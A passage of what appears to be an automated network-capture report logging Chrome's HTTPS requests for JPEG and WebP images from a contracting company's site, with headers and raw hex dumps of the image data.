                                              Data Ascii: J%+@EH1e^FkEEYi6~v]E0LWDC.$DxN.&wDYgthhSxRHO2.`tAEU7!1A 2Q"0a#@BP3R`q$b4r?ndt[(?SCO+dSw[-eviH<2BQANJT['to<s7/lGE>/


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              145192.168.2.465482173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:25 UTC714OUTGET /uploads/news/7/37084e21a1e397964e863e3221dbb8f2.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:25 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:25 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:29:31 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 44001
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:25 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff da 00 08 01 01 00 00 00 00 f6 d7 79 da a5 29 4b d7 cc 64 c9 45 45 34 e4 53 18 42 b8 c2 aa d4 61 08 46 0a aa e1 08 28 c6 35 c1 25 18 a8 d1 14 92 41 11 24
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"y)KdEE4SBaF(5%A$
                                              2024-09-27 06:20:25 UTC8000INData Raw: aa aa ab f6 2a aa aa bd ea aa bf b1 5f 5d 7b d2 a5 55 55 55 55 55 55 55 55 55 55 54 aa ab 8d 55 55 2a de aa aa aa aa ab fa 35 f6 57 e8 55 7a 55 55 55 2a aa aa aa aa aa aa aa aa aa af 5a f4 aa aa aa af f0 d5 e9 55 e9 55 f6 d2 aa aa aa da 95 7b 57 a5 55 55 52 af f2 54 ab e9 ad aa 95 56 d4 aa ab d6 a9 56 d5 5b 57 f4 2b f8 15 bd 6d 5f 75 6d 55 bd 7b d7 a5 6f 55 5f d5 ad ab f5 2a aa be 9a f5 aa ad e9 55 6f 54 aa aa a9 55 52 aa aa af e7 57 f0 6b eb a5 4a a9 55 6f 55 55 b5 55 2a aa 55 55 b5 52 af e8 11 b5 7f 16 b6 aa a5 5e 94 ab ea af 5a aa aa fe a5 7e 8d 7e a5 6f 55 ed 4a aa bd ab fd 45 2a fd 3a 55 fa 15 fe 12 ab f5 2a bd eb 6a da b6 af fc 12 bf f0 e1 ff 00 c5 ca ff 00 f0 45 57 ff 00 0f de 3b db 9c 36 7b ff 00 dd 52 73 0e 04 ae 96 76 e6 05 5f ed e6 c6 e8 39 3f
                                              Data Ascii: *_]{UUUUUUUUUUTUU*5WUzUUU*ZUU{WUURTVV[W+m_umU{oU_*UoTURWkJUoUUU*UUR^Z~~oUJE*:U*jEW;6{Rsv_9?
                                              2024-09-27 06:20:26 UTC8000INData Raw: 42 98 d1 3e d5 29 b9 53 5d c1 38 78 5f 45 3b 7a a6 32 9d a0 cb 55 19 d1 e8 94 0d 47 25 d1 34 f0 51 9e 89 cd 39 9a eb ac 43 35 65 50 f9 81 0a 30 5a 35 af 70 20 6a 9f a8 29 c3 50 b9 a0 9b 55 3c 7f 0e 52 3a 29 c5 a4 60 72 81 c3 7a ad 51 bb c2 f0 51 e5 fe 8c f9 f0 ae 0d 78 6e 5b dd 46 cd f9 1d 98 f5 4e 75 82 26 e8 a3 cd 39 38 2a b6 aa 8b 92 72 72 2b 34 ed 0b c4 85 e8 29 d5 0b 71 46 a8 f0 17 47 25 49 5c 82 e0 4e 88 11 64 17 15 a9 54 0a da 2b 2f 79 ce ca 3a 50 af 7a 3f b7 63 df e1 69 2b 12 45 4e e7 aa 01 a0 17 55 06 e8 36 6f 6c 27 65 95 0e ca 6a 68 a1 1a 5d 4b 20 a3 59 40 a6 3a b9 30 6b 74 d1 a0 da 17 d1 0e 6b 90 59 83 ab b3 c3 e8 b7 4f aa 24 0d 95 41 d1 b4 91 5a 14 e1 a5 13 87 35 d5 66 d1 05 5d 0e d0 75 a2 67 01 4f 45 23 7c 32 2c 4b 35 65 55 01 ab 4d 54 6e 03
                                              Data Ascii: B>)S]8x_E;z2UG%4Q9C5eP0Z5p j)PU<R:)`rzQQxn[FNu&98*rr+4)qFG%I\NdT+/y:Pz?ci+ENU6ol'ejh]K Y@:0ktkYO$AZ5f]ugOE#|2,K5eUMTn
                                              2024-09-27 06:20:26 UTC8000INData Raw: 45 7a ad da 14 fc 45 03 4f 84 29 2d a2 6f 95 37 a2 14 4e 19 29 e1 59 de 1c d4 3c a1 57 80 56 59 a9 b2 99 c6 dc cc 95 bf 95 52 67 b7 9e c9 31 b9 03 28 0b 79 ac 63 4f 89 8b 15 cd 8b 17 1f ca 1c 3a 29 63 f1 35 c1 1e 68 b6 56 6f 6a 8d 4d 48 fc 02 4d 94 c0 5e 37 7d 95 35 07 f8 0b aa bc 2d e4 51 ae c2 9c 1b 4e 41 3b 9a 77 34 fe 69 fc 57 40 ba 04 3c 81 37 ca 14 7c 94 3c 42 1b d4 e2 9b 4b a2 dd 13 95 5b 45 9f 44 f1 7c aa 4f 2a 73 cd 68 a9 de 09 a9 b4 da da a8 f8 20 86 ca d9 33 8a 1c 95 5a 53 f3 8b 71 57 3b 0e bd ea 63 61 f5 45 15 ba 56 ec 67 68 08 3a 22 0e 8a 62 df 72 eb 29 6b be 0a 08 14 13 56 52 b3 6c 29 c9 fc 94 d1 ba b4 d7 63 18 6e 99 a0 6a 60 f9 53 1f 10 03 5a d5 1c b6 d5 48 a5 ae ab 10 56 30 e9 94 7d 42 c6 6b 9d 9f 75 88 82 f2 16 91 d0 a7 d7 54 e1 aa 04 fa
                                              Data Ascii: EzEO)-o7N)Y<WVYRg1(ycO:)c5hVojMHM^7}5-QNA;w4iW@<7|<BK[ED|O*sh 3ZSqW;caEVgh:"br)kVRl)cnj`SZHV0}BkuT
                                              2024-09-27 06:20:26 UTC8000INData Raw: b1 99 dc 4c f0 55 f9 4a ae 08 82 17 5d 47 0a b0 38 2f 75 13 00 e0 07 66 34 01 60 7a 9a 08 a7 2f fb ae 0f 84 39 f7 88 b1 52 4c ea 24 b7 7b 14 f8 6f b0 33 27 07 7d c3 38 94 3e f8 c7 be 7c 86 48 f6 c9 ce 9a 41 25 d6 19 eb 70 24 f5 32 08 29 8c 70 5d 70 06 9d 3f 0f a1 9e e4 f8 56 0c f7 dd 1a fa 7e 8e 8c 00 d7 01 c2 5e 64 c3 bc ae 79 e1 91 db 33 36 15 3d ea 54 07 b5 e3 76 81 9e b9 64 a3 7c 0e 19 90 50 fd f4 28 5a 41 65 9a 85 04 a1 ff 00 b9 71 59 24 38 cc 5b 05 d1 84 27 96 a2 e2 a6 68 e2 73 9d 03 f5 88 42 f3 73 35 5f 93 2a 7e 77 f4 31 6c 7a c7 29 04 99 59 5e dd c4 e7 de e6 23 97 d8 e9 08 09 ae 11 72 b3 13 01 9f 4e 64 0f d0 37 1e b7 79 fe 1c eb 11 5c b6 79 94 cb 73 93 15 33 f5 cb ff 00 f5 bd 32 f6 08 e2 d0 31 d1 8c 88 44 fb d6 27 90 e1 95 50 7a 8e 6b 27 e8 e7 e5
                                              Data Ascii: LUJ]G8/uf4`z/9RL${o3'}8>|HA%p$2)p]p?V~^dy36=Tvd|P(ZAeqY$8['hsBs5_*~w1lz)Y^#rNd7y\ys321D'Pzk'
                                              2024-09-27 06:20:26 UTC4070INData Raw: 3f 65 d2 22 ff 00 78 2e b1 13 fe f0 20 04 e4 df 70 3a b8 a1 32 b8 0c cf 00 ff 00 61 95 2b ec b6 89 a1 fd 33 2b 5f 08 17 3d 4e 3a 5a ac c8 04 eb 34 2f 92 3f dd ce f9 34 2d a9 72 e5 74 c4 3f ec e1 f2 ff 00 56 4d 61 f6 dd cf 1e f2 fa 40 e4 54 9c b7 f1 7c ac 71 e8 fc 26 11 4f d8 c1 e2 64 67 87 5f c1 f3 07 3c 1f 03 7b 67 b7 51 6e dd b0 6b 16 f9 7a 82 67 2a 1d f3 ab 68 15 86 a3 c9 ce 50 eb 30 9a ea 66 38 77 a1 f3 a7 c3 92 f7 b9 2d 18 71 a0 09 b8 2e 77 27 9c fe b0 0b c1 c7 83 66 e1 8d c2 bc 98 e0 0c 7a ca b5 06 65 a5 94 f4 b9 cb 04 fb d3 d4 b8 77 a6 bb 5d 72 8b 04 e0 60 ba d7 26 26 7d e2 7e b9 c1 32 ff 00 46 4c db fa c6 34 f5 3f d6 37 2e 05 0a 61 38 64 90 78 d4 61 9e 26 4e e6 35 e2 86 f8 0e 56 e5 82 cf 82 03 74 18 fa c0 06 46 6d d5 a4 d6 0e 73 ca 39 2e 95 ab 55
                                              Data Ascii: ?e"x. p:2a+3+_=N:Z4/?4-rt?VMa@T|q&Odg_<{gQnkzg*hP0f8w-q.w'fzew]r`&&}~2FL4?7.a8dxa&N5VtFms9.U


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              146192.168.2.465484173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:26 UTC719OUTGET /uploads/dynamic/14/8b17fc00a52e697a42c3c2c98aaff156.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:26 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:26 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 14:41:01 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 70462
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:26 UTC7931INData Raw: 52 49 46 46 36 13 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 c2 12 01 00 b0 96 05 9d 01 2a cf 04 a3 03 3e e9 6e ae 52 29 26 29 af a6 b7 0a 39 f0 1d 09 63 4b 96 72 eb ea d4 f2 93 6a 62 fc 5b 78 e8 71 06 6b d0 7b e6 ff 09 d6 29 e8 7c 27 c8 ff 93 ff 15 9f 1f 6d b5 f0 fd a7 af bf fa bc 89 f8 df fd 5f bf fe c9 be fb fe df ef cf 69 3e a1 7f aa 7f f8 f4 ff f5 41 ea 8b 9e cf cd 7b ff ff 57 d7 af 06 f5 d7 f6 3c 91 1f a3 79 43 fa 4f f5 fe 08 fe 8d ee f7 ba 15 fa fe 9b c1 3f 8e 5e bb ff d6 f0 07 e7 17 d4 de c1 7f 9b f9 05 f2 ff c1 f7 7e ff ad e8 29 ee 47 e1 7f fd 7a ee fe e7 9d 5f db ff bc f6 03 ff 15 fe db d7 5f 06 4a 03 7f 56 ff 77 eb 29 ff 6f ff ff fd 3e ad ff 6a ff bb ec 37 fd 73 fd 87 ff ef f6 dd ba ca 4c 19 b7 99 ae ff
                                              Data Ascii: RIFF6WEBPVP8XVP8 *>nR)&)9cKrjb[xqk{)|'m_i>A{W<yCO?^~)Gz__JVw)o>j7sL
                                              2024-09-27 06:20:26 UTC8000INData Raw: f3 d3 7c 8f 9c 6d b0 48 69 66 c0 12 f5 20 59 df 1d 04 07 cc 42 f5 76 53 0d ce d1 1a e1 66 cc 79 00 75 bb c6 2c b5 93 0f b6 89 16 11 98 bd e4 a7 53 1c 67 5b 1e 50 6c 87 c6 37 12 5f 07 37 ef 63 48 a3 e5 ba c0 1d b2 0c f6 e6 0f a3 69 a9 4b 0f 0b 40 cd 32 6c eb 3d 4b a2 55 2f aa 7c e8 11 f5 2b 51 65 e7 2c 92 73 d1 ca 3d b2 4f 79 e4 d6 fe 32 40 79 ec 44 a1 2a 0b cf 24 c9 f0 b0 78 b0 b6 dc af 01 13 39 12 91 e1 22 ef 67 43 21 d3 65 c4 9f 56 ff 7e aa 76 71 76 64 3e 79 f6 fb ef 5f 4f 69 75 37 56 9f ae 01 92 fc be b4 a5 76 27 35 07 af 01 4b 95 39 12 3a be 81 07 0d 24 94 55 6f 1c fa dc 19 69 b6 8f e0 52 65 10 fa c1 2b fa 59 c1 c9 39 a6 17 d6 8f 47 c5 d3 c6 46 e9 c9 51 b4 66 e6 7a 77 2c b8 38 f6 63 7e 87 9b b5 11 5b bd 6d 4a 7a 8b f4 b4 84 74 79 bd 87 57 9f a5 bf aa
                                              Data Ascii: |mHif YBvSfyu,Sg[Pl7_7cHiK@2l=KU/|+Qe,s=Oy2@yD*$x9"gC!eV~vqvd>y_Oiu7Vv'5K9:$UoiRe+Y9GFQfzw,8c~[mJztyW
                                              2024-09-27 06:20:26 UTC8000INData Raw: 70 ce 53 88 99 9b 46 3a cb 27 64 f8 8f 14 71 94 cb bd 68 ed d0 32 b2 56 da 1f 42 32 7e bd 4d a1 36 41 fa 64 42 50 9e b3 6a e3 3a 2b 52 97 0a 67 53 be 81 c5 ec 98 80 7d ff 97 0d 02 b7 a8 c6 49 38 58 f8 3d 97 f4 50 7f 1b 37 76 4a 9b 4e be 76 72 93 c8 df 9c e1 c4 75 83 f0 7c 8e 2b 89 5d e9 9c 35 ee 6d 8e e5 0c 3a 19 a7 75 1f 1b c0 6e 66 c2 81 01 68 34 e5 20 77 ff 93 93 5c 91 9c 75 7b c4 4b 19 e2 45 22 ec 4d d3 66 d8 4c 83 ea 75 84 ca 4a f0 49 9a f5 7d 8f 29 cc 0f 55 33 84 80 41 22 3d 8b a3 1b 4a 0d 17 61 8d b7 b8 57 be 29 70 fd 08 d6 47 a1 ae 37 80 9c 3d 40 13 24 f6 7c e8 88 f0 38 09 d8 cf 19 c2 80 cd e0 a9 41 1e 01 93 35 b2 f5 95 06 aa 26 7c 86 1d da 53 a5 b6 29 1b 73 17 b3 81 1c cd 7b ba 9c 9a 72 06 b3 75 05 0a 46 6b ea 78 52 e3 d2 e9 16 3d ad 51 94 2b 0e
                                              Data Ascii: pSF:'dqh2VB2~M6AdBPj:+RgS}I8X=P7vJNvru|+]5m:unfh4 w\u{KE"MfLuJI})U3A"=JaW)pG7=@$|8A5&|S)s{ruFkxR=Q+
                                              2024-09-27 06:20:26 UTC8000INData Raw: 83 e6 62 48 f6 4d 21 c1 1e 5c 99 17 79 bd 80 66 9b b9 93 be 07 0d 20 72 d4 ea 93 b8 b2 e9 66 6e 0b 2b 19 80 ed 04 60 ce 9d 0d c9 84 b3 a9 b1 1a e4 b1 43 74 3c 1e 8f d2 18 08 82 42 f0 25 f4 16 fd fe 6e 91 64 66 a3 98 92 40 c3 3a bd 85 a6 70 26 72 9c a1 80 11 b8 2d 60 84 03 62 92 f5 90 31 b9 b2 0f 56 4f 3b 3c 92 1c 13 33 85 61 8a f1 cf 65 fb 81 ad 5c 36 6c 2b 09 c6 d1 e0 44 00 8d 78 6f 56 df 68 95 2d 3b 45 dd 8d f6 52 43 74 1e ae ab a9 2e ad 7b e9 07 46 d3 6f 56 5c a2 2d 77 a6 c0 07 ad cc ee 25 9d f5 89 33 c4 92 eb 62 76 8b 39 e3 d2 f4 1b e2 f8 9a 01 f9 66 24 52 22 78 e2 87 3b cb 96 5d 20 60 76 27 26 84 69 3b 05 fa f6 66 ae 9d 31 bc 00 1f a4 a3 d3 d3 1c 55 0e af e5 94 ab ed e7 21 bf 69 63 59 83 e3 c9 93 6d f2 cd 20 41 76 75 26 f0 d1 75 54 0c c2 e3 80 bd d2
                                              Data Ascii: bHM!\yf rfn+`Ct<B%ndf@:p&r-`b1VO;<3ae\6l+DxoVh-;ERCt.{FoV\-w%3bv9f$R"x;] `v'&i;f1U!icYm Avu&uT
                                              2024-09-27 06:20:26 UTC8000INData Raw: 64 ba e2 63 28 47 5f c0 d6 6d d4 b8 5c 43 15 23 d9 b3 c9 08 d4 dd 52 d1 b3 87 b0 ba c6 54 f8 35 1e 83 c9 64 e9 d1 71 6d 93 df 2d 2a e7 2c 21 70 d9 e2 aa 31 c7 35 e6 28 85 d6 06 07 94 9b 7e f0 b0 11 ac e4 50 c5 d0 0d 8a a9 0f fc a5 7d 42 d0 b5 ba 1c 7a 42 e0 90 37 a3 13 b2 58 c9 58 7c d1 0b a0 5c 37 2e a6 28 e3 97 01 78 d8 cc b1 be 83 76 15 41 6d 31 2b cb aa e6 de f6 b9 99 5a 06 42 31 4c f8 ed 7f 62 79 7f 9e 61 f7 be 1d 35 96 b9 70 f9 86 20 d1 a1 49 36 8f 15 a7 07 7b 3e f3 19 d9 59 56 5c f7 b8 cd 50 ab 74 2a b0 3a 1a d7 f2 c6 33 28 18 7d 75 ae 1d 27 61 e8 57 85 5e c9 a7 08 60 f1 28 84 91 48 33 47 48 0a f6 85 0b bc 09 49 34 44 6d 05 26 d8 bb b1 4b 37 b0 1f fe c2 7c cc 11 d1 6a 1a 5c 62 39 36 d3 92 3b 03 a2 4b 56 1f 21 92 b9 56 a8 a9 8f 6c 20 01 78 bb f5 bb
                                              Data Ascii: dc(G_m\C#RT5dqm-*,!p15(~P}BzB7XX|\7.(xvAm1+ZB1Lbya5p I6{>YV\Pt*:3(}u'aW^`(H3GHI4Dm&K7|j\b96;KV!Vl x
                                              2024-09-27 06:20:26 UTC8000INData Raw: b8 44 63 72 3f f0 46 eb 94 dc 7c 6f 6a 8a 5f 4d 77 25 71 99 f6 11 37 2e 63 e5 b1 e3 fd 79 f3 a8 f0 a4 39 5a 04 fd 2c 1c 63 50 c7 4d aa bf 63 22 bf bd cb 90 11 c3 92 9c 7a ee bf aa 8c bd 2d 4b 99 47 9a 06 89 c6 29 80 25 82 7a 5e c0 01 a3 a6 67 1f 46 ae ec 6d ef 9f 88 c1 3d 66 a0 78 33 da 7f 17 80 b5 da 82 8f d4 fc 7e 05 3b 8d bc d9 bc f3 7d aa ad be 44 41 b8 d5 06 08 d7 48 7c 65 05 0a 38 3e 58 76 d9 6c 06 8b 19 28 59 8a dc e9 38 72 f3 2b 8b f8 c2 37 9b 26 ce db 04 a1 e7 66 61 9d a9 21 ba c0 cc 02 44 ec 37 5b d7 6b 7d 9c 93 59 84 75 13 48 20 2f f4 d7 3d c5 03 e6 ac d2 04 6b ba 46 b1 04 c1 55 4d 07 44 2c 9b 82 32 de 37 26 17 32 ef 64 07 f5 3e ce b6 25 20 58 41 e9 53 90 cf 73 2b eb c3 9c ab 31 68 50 28 c8 61 0d 5e 57 1a a5 a3 aa 26 91 57 2e 91 86 13 2c 3b cb
                                              Data Ascii: Dcr?F|oj_Mw%q7.cy9Z,cPMc"z-KG)%z^gFm=fx3~;}DAH|e8>Xvl(Y8r+7&fa!D7[k}YuH /=kFUMD,27&2d>% XASs+1hP(a^W&W.,;
                                              2024-09-27 06:20:26 UTC8000INData Raw: f2 c1 13 00 6b a4 60 92 24 c3 90 a9 a3 c7 34 bf e0 b9 0b 8b 0f d4 3b 53 91 98 3b ed 0e 53 15 01 88 dc 69 01 41 aa 43 c2 c9 bb 6c f8 3a b0 85 7b df 8a 93 c0 0f 92 14 fe e4 d6 64 05 e2 bc 0c db cb d6 f1 a0 b7 fc b9 05 5c 7b 2d 38 c1 6a d9 5a 41 9a 7a d4 87 80 c1 31 04 02 04 67 11 97 09 81 7a e6 b9 8a 0a 83 44 23 bb 99 78 2e ff 6d 9b 7d 4a 8d f7 0a a1 4d 24 7d e6 06 42 e2 e1 fa 43 88 7d 00 53 98 7f c6 50 33 e0 8a 72 65 c3 f5 04 73 3c 3a e4 1b 0a 88 5d 26 bf 70 a9 11 b9 12 89 3a 69 4e 96 e7 52 c4 31 0c 25 72 e3 95 47 fa ac 16 7d 63 74 dc 8d 67 0e 7c 35 ad e5 e8 d2 b8 52 c1 c5 4e 8a a0 3b e5 74 15 52 ab 21 c2 dd 3c 53 52 19 b5 2f 1c db 77 00 e4 20 a3 c7 1c f5 37 90 96 91 5e 1c 8f 06 2d 68 b3 e9 df 3b a6 f4 fa a3 54 03 26 39 08 95 84 b5 cd 7b e2 f7 88 b3 90 09
                                              Data Ascii: k`$4;S;SiACl:{d\{-8jZAz1gzD#x.m}JM$}BC}SP3res<:]&p:iNR1%rG}ctg|5RN;tR!<SR/w 7^-h;T&9{
                                              2024-09-27 06:20:26 UTC8000INData Raw: fe d9 c4 a0 d6 c9 ae 8a 70 21 1a c3 b7 98 54 8b 22 ab 3f e2 3b 84 93 1c a0 3f 04 77 16 79 0b 29 4d b9 1e 66 39 4b fd 92 6e de 74 db 5f fb 08 4f 79 11 7e 23 7d b3 95 5a 20 a0 3f da a4 25 71 bf 6d 8c 77 ed 8e cb 3d 2b 02 b5 cb 3c a3 ef 6b 64 79 42 54 fe 68 2f 7b 25 d3 9f 9b 52 d6 a2 6c b4 99 89 36 35 ad 34 8e 45 ea e6 46 99 7a 2d 56 0c cc 5f 0f db a5 57 2b 04 95 43 bc 46 f2 8b 56 f3 e6 39 fa 8e 0c 5d a7 dd 2f b7 d3 ea 8f 46 42 6a 32 43 90 bf c1 2b 2d 28 57 49 5e cb 75 29 7f b2 ba 1d 5f e0 33 b0 7a 28 c9 17 70 c1 b2 69 e1 ac b8 a1 4c 89 99 52 98 a1 47 96 32 f3 b0 63 a9 be 62 72 26 44 b7 bf 72 ed b4 79 bc d3 60 f2 ac 09 1b 8e b9 c6 2f 01 6f 46 22 bf 24 3d 47 43 80 18 17 5c 27 32 81 d1 e9 4d 61 cb f6 d0 3f 27 f3 68 11 c5 c3 38 7c e0 ef 35 15 a7 b6 b9 0d 3f 48
                                              Data Ascii: p!T"?;?wy)Mf9Knt_Oy~#}Z ?%qmw=+<kdyBTh/{%Rl654EFz-V_W+CFV9]/FBj2C+-(WI^u)_3z(piLRG2cbr&Dry`/oF"$=GC\'2Ma?'h8|5?H
                                              2024-09-27 06:20:26 UTC6531INData Raw: a1 2d f9 b4 fa 68 e8 a1 f2 2a 60 0b 02 d4 ad b8 4d 85 2e e4 f7 fa 9f d6 3f a3 34 54 53 53 61 c4 e9 c2 a4 1b a7 4b fb 94 9a c6 91 e0 78 67 96 2e 6b e5 bb 22 0b df 19 4f e1 af 9d 1f 0b 1e e3 57 eb 73 62 21 e7 1c 64 c3 1c eb 8c d2 ff e7 ea 94 91 68 a8 3f dc 44 16 9e f8 09 40 31 b9 99 92 74 f0 17 ad ad 64 bf 34 36 7a 33 28 5a 5b 05 94 aa 67 ea c0 db 0c 43 d4 c3 e0 66 58 36 6d ee 26 2a f2 e4 93 be 8c c7 61 4f ee 4d fb 32 e7 bb 35 16 24 f9 e9 26 46 64 48 54 70 83 61 0c 4c a1 ac 7e 17 7c 29 01 52 ec e8 b9 e8 e5 a6 24 4f d2 76 cf 55 e1 2d 1f 4a fd 2a c3 35 0f 7c bf 7d 8c fd e2 23 31 2d 36 bc 4f d7 c1 65 07 19 81 de d4 7d 89 04 30 74 9a 4d 75 91 f4 69 5c 95 a9 03 97 23 2d d5 31 47 39 4f 55 d8 2d 6a c4 45 46 e3 4e ef fa e1 9c b1 3a 74 42 8f ca 75 12 2f e5 ca 72 18
                                              Data Ascii: -h*`M.?4TSSaKxg.k"OWsb!dh?D@1td46z3(Z[gCfX6m&*aOM25$&FdHTpaL~|)R$OvU-J*5|}#1-6Oe}0tMui\#-1G9OU-jEFN:tBu/r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              147192.168.2.465483173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:26 UTC714OUTGET /uploads/news/8/f4810eb779b4747ca187846d0aff124a.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:26 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:26 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:33:01 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 186098
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:26 UTC7930INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 96 00 96 00 00 ff e1 28 46 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 1a 00 05 00 00 00 01 00 00 00 56 01 1b 00 05 00 00 00 01 00 00 00 5e 01 28 00 03 00 00 00 01 00 03 00 00 01 31 00 02 00 00 00 28 00 00 00 66 01 32 00 02 00 00 00 14 00 00 00 8e 87 69 00 04 00 00 00 01 00 00 00 a2 00 00 00 c2 00 00 00 3b 00 00 00 01 00 00 00 3b 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 4c 69 67 68 74 72 6f 6f 6d 20 36 2e 37 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 32 3a 30 39 20 31 37 3a 35 33 3a 31 32 00 00 02 90 00 00 07 00 00 00 04 30 32 33 30 a0 01 00 03 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 10 01 1b 00 05 00
                                              Data Ascii: JFIF(FExifMM*V^(1(f2i;;Adobe Photoshop Lightroom 6.7 (Windows)2020:02:09 17:53:120230
                                              2024-09-27 06:20:26 UTC8000INData Raw: 58 0e f9 57 ab 39 e1 ed 68 8e ea 9d 2b 6a f6 bb 08 a7 ec b5 64 b6 61 c5 50 e7 3f 76 f1 02 ae 76 df e1 c8 b6 95 2a 6c e3 d6 c1 47 de 37 f8 44 e8 da b6 77 a4 1a e3 98 48 a6 44 0d c0 bb 16 3e e1 96 27 b5 1b 57 4f da cd a1 9f 71 f4 93 29 7a 4b 55 5f 8e a6 1d a6 d5 93 aa 2a 67 9b d4 4f 99 37 f6 9c b0 f7 18 9d 23 6c 6a b2 c6 97 b4 48 9a 70 04 e9 04 05 c7 b6 02 16 1c 87 ce 02 28 62 34 d3 db 01 32 39 f5 a0 00 42 0e a0 f9 c0 37 03 ce 02 1c c7 95 a0 22 82 78 e9 e3 00 dd 9b 6a 4f e1 01 03 5b 80 1e d8 08 58 8b d8 7b 60 17 7a 47 23 e3 01 2e 0f 1b 8e be 50 03 87 02 6d c4 df 97 89 80 ff d7 e0 ad f6 b4 82 53 2f da f2 80 19 45 b5 b9 80 53 61 c3 e3 01 bf 86 63 98 9e 1a f9 a9 2a 19 16 fa cb 3d a4 3e 68 74 82 5d 76 1d e9 22 53 a6 ee be 46 e5 ed a4 e9 43 32 13 e2 bd e1 f7 a2
